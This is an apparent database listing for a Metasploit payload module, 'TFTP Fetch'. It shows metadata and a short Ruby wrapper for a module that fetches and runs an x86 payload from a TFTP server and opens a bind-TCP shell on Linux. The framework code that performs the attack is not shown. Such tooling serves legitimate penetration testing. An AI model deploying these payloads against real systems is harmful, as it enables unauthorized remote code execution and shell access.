Lucene search

K
metasploitBrendan Watters, Spencer McIntyre, skape <[email protected]>, egypt <[email protected]>, OJ ReevesMSF:PAYLOAD-CMD-LINUX-TFTP-X86-SHELL-BIND_TCP_UUID-
HistoryJun 09, 2023 - 8:47 p.m.

TFTP Fetch, Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)

2023-06-0920:47:45
Brendan Watters, Spencer McIntyre, skape <[email protected]>, egypt <[email protected]>, OJ Reeves
www.rapid7.com
74
metasploit
tftp
linux
command shell
bind tcp
uuid support
x86
payload
adapter
fetch
arch
license
brendan watters
spencer mcintyre

Fetch and execute a x86 payload from a TFTP server. Spawn a command shell (staged). Listen for a connection with UUID Support (Linux x86)

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

module MetasploitModule
  include Msf::Payload::Adapter::Fetch::TFTP
  include Msf::Payload::Adapter::Fetch::LinuxOptions

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'TFTP Fetch',
        'Description' => 'Fetch and execute a x86 payload from a TFTP server.',
        'Author' => ['Brendan Watters', 'Spencer McIntyre'],
        'Platform' => 'linux',
        'Arch' => ARCH_CMD,
        'License' => MSF_LICENSE,
        'AdaptedArch' => ARCH_X86,
        'AdaptedPlatform' => 'linux'
      )
    )
  end
end